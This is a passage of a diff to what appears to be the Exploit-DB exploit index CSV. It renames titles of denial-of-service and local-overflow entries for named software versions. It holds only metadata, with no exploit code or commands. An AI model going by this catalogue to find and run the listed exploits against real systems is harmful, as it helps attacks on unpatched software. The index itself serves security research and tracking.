Service",2003-06-17,dr_insane,windows,dos,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of 
Service",2003-06-18,"Frank DENIS",linux,dos,0 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 22800,platforms/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 @@ -2906,7 +2906,7 @@ id,file,description,date,author,platform,type,port 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos,0 22822,platforms/windows/dos/22822.txt,"Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 22823,platforms/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos,0 -22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0 +22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - GET Remote Denial of Service",2003-06-23,posidron,windows,dos,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 22844,platforms/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,windows,dos,0 
@@ -2917,7 +2917,7 @@ id,file,description,date,author,platform,type,port
 22875,platforms/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos,0
 22876,platforms/hardware/dos/22876.txt,"Canon GP300 - Remote GET Denial of Service",2003-07-07,"DOUHINE Davy",hardware,dos,0
 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 - JP2KLib&CoolType Crash (PoC)",2012-11-21,coolkaveh,windows,dos,0
-22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - 'GET' Request Buffer Overflow",2003-07-07,posidron,linux,dos,0
+22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Buffer Overflow",2003-07-07,posidron,linux,dos,0
 22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server - Denial of Service (1)",2003-06-10,st0ic,windows,dos,0
 22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server - Denial of Service (2)",2003-07-14,st0ic,windows,dos,0
 22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service (PoC)",2012-11-22,t4c,linux,dos,0
@@ -3043,7 +3043,7 @@ id,file,description,date,author,platform,type,port
 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,windows,dos,0
 23480,platforms/windows/dos/23480.txt,"Surfboard httpd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",windows,dos,0
 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0
-23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0
+23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0
 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0
 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",windows,dos,0
 23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0
@@ -3069,7 +3069,7 @@ id,file,description,date,author,platform,type,port
 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0
 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0
-23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
+23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0
 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0
 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0
@@ -3082,7 +3082,7 @@ id,file,description,date,author,platform,type,port
 23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0
 23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0
 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0
-23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
+23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0
 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0
 23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0
 23672,platforms/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Vulnerabilities",2004-02-09,"Bruno Morisson",hardware,dos,0
@@ -3319,11 +3319,11 @@ id,file,description,date,author,platform,type,port
 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0
 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0
 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0
-25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0
+25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0
 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0
 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0
 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0
-25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service",2005-02-19,MurDoK,hardware,dos,0
+25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,hardware,dos,0
 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0
 25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0
 25140,platforms/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0
@@ -3548,7 +3548,7 @@ id,file,description,date,author,platform,type,port
 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",linux,dos,0
 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0
 27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0
-27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0
+27775,platforms/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0
 27778,platforms/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,linux,dos,139
 27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0
 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0
@@ -3923,7 +3923,7 @@ id,file,description,date,author,platform,type,port
 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0
 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0
 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
-31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
+31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
@@ -4099,7 +4099,7 @@ id,file,description,date,author,platform,type,port
 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0
 32573,platforms/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos,0
 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0
-32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
+32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0
 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0
 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0
 32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos,0
@@ -4270,7 +4270,7 @@ id,file,description,date,author,platform,type,port
 33755,platforms/php/dos/33755.php,"PHP 5.3.2 'xmlrpc' Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0
 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0
-33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0
+33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Format String Denial of Service",2010-03-20,Rick2600,windows,dos,0
 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0
 33801,platforms/linux/dos/33801.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple Memory Corruption Vulnerabilities",2010-03-24,"Bob Clary",linux,dos,0
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow",2014-06-18,LiquidWorm,windows,dos,0
@@ -4286,7 +4286,7 @@ id,file,description,date,author,platform,type,port
 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
-33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
+33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0
 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0
@@ -4337,7 +4337,7 @@ id,file,description,date,author,platform,type,port
 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0
 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0
-34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
+34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0
 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0
@@ -4483,7 +4483,7 @@ id,file,description,date,author,platform,type,port
 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",windows,dos,0
 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0
 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption (PoC)",2015-02-26,"Andras Kabai",linux,dos,0
-36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos,0
+36198,platforms/multiple/dos/36198.pl,"Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service",2011-10-01,"Usman Saeed",multiple,dos,0
 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial of Service",2011-04-11,"Luigi Auriemma",windows,dos,0
 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 - Buffer Overflow / Denial of Service",2011-10-13,"Fredrik Widlund",multiple,dos,0
 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0
@@ -4500,7 +4500,7 @@ id,file,description,date,author,platform,type,port
 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0
-36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0
+36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0
 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0
 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0
 36388,platforms/linux/dos/36388.py,"Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,dos,0
@@ -4578,7 +4578,7 @@ id,file,description,date,author,platform,type,port
 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0
 37462,platforms/windows/dos/37462.pl,"VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0
 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0
-37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' File Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0
+37471,platforms/windows/dos/37471.pl,"Zoom Player - '.avi' Divide-by-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0
 37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service",2012-07-03,"Kevin Fenzi",linux,dos,0
 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
 37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0
@@ -4641,8 +4641,8 @@ id,file,description,date,author,platform,type,port
 37853,platforms/windows/dos/37853.txt,"Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (1)",2015-08-19,"Google Security Research",windows,dos,0
 37854,platforms/windows/dos/37854.txt,"Adobe Flash AS2 - MovieClip.scrollRect Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0
 37855,platforms/multiple/dos/37855.txt,"Adobe Flash - Setting Value Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
-37856,platforms/windows/dos/37856.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (1)",2015-08-19,"Google Security Research",windows,dos,0
-37857,platforms/windows/dos/37857.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (2)",2015-08-19,"Google Security Research",windows,dos,0
+37856,platforms/windows/dos/37856.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1)",2015-08-19,"Google Security Research",windows,dos,0
+37857,platforms/windows/dos/37857.txt,"Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2)",2015-08-19,"Google Security Research",windows,dos,0
 37858,platforms/windows/dos/37858.txt,"Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0
 37859,platforms/multiple/dos/37859.txt,"Adobe Flash - XML.childNodes Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
 37860,platforms/windows/dos/37860.txt,"Adobe Flash AS2 - Color.setRGB Use-After-Free",2015-08-19,bilou,windows,dos,0
@@ -4841,7 +4841,7 @@ id,file,description,date,author,platform,type,port
 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0
 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0
 38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
-38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
+38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0
@@ -4996,9 +4996,9 @@ id,file,description,date,author,platform,type,port
 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0
 39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
 39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
-39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
-39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
-39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
+39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
+39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
+39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
 39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
@@ -5132,7 +5132,7 @@ id,file,description,date,author,platform,type,port
 39825,platforms/multiple/dos/39825.txt,"Adobe Flash - Out-of-Bounds Read when Placing Object",2016-05-17,"Google Security Research",multiple,dos,0
 39826,platforms/multiple/dos/39826.txt,"Adobe Flash - Overflow in Processing Raw 565 Textures",2016-05-17,"Google Security Research",multiple,dos,0
 39827,platforms/multiple/dos/39827.txt,"Adobe Flash - Heap Overflow in ATF Processing (Image Reading)",2016-05-17,"Google Security Research",multiple,dos,0
-39828,platforms/multiple/dos/39828.txt,"Adobe Flash - '.MP4' File Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0
+39828,platforms/multiple/dos/39828.txt,"Adobe Flash - '.MP4' Stack Corruption",2016-05-17,"Google Security Research",multiple,dos,0
 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0
 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0
 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0
@@ -6141,7 +6141,7 @@ id,file,description,date,author,platform,type,port
 3776,platforms/windows/local/3776.c,"ACDSee 9.0 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0
 3777,platforms/windows/local/3777.c,"XnView 1.90.3 - '.xpm' Local Buffer Overflow",2007-04-22,Marsu,windows,local,0
 3779,platforms/windows/local/3779.c,"Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow",2007-04-23,Marsu,windows,local,0
-3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow",2007-04-24,Marsu,windows,local,0
+3793,platforms/windows/local/3793.c,"Adobe Photoshop CS2 / CS3 - '.bmp' Buffer Overflow",2007-04-24,Marsu,windows,local,0
 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0
 3798,platforms/windows/local/3798.c,"FreshView 7.15 - '.psp' Buffer Overflow",2007-04-25,Marsu,windows,local,0
 3801,platforms/windows/local/3801.c,"GIMP 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow",2007-04-26,Marsu,windows,local,0
@@ -6407,7 +6407,7 @@ id,file,description,date,author,platform,type,port
 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,windows,local,0
 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,windows,local,0
 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0
-8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0
+8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0
 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)",2009-04-30,"Jon Oberheide",linux,local,0
 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,windows,local,0
 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' Overwrite (SEH)",2009-04-30,His0k4,windows,local,0
@@ -8091,7 +8091,7 @@ id,file,description,date,author,platform,type,port
 22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0
 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0
 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0
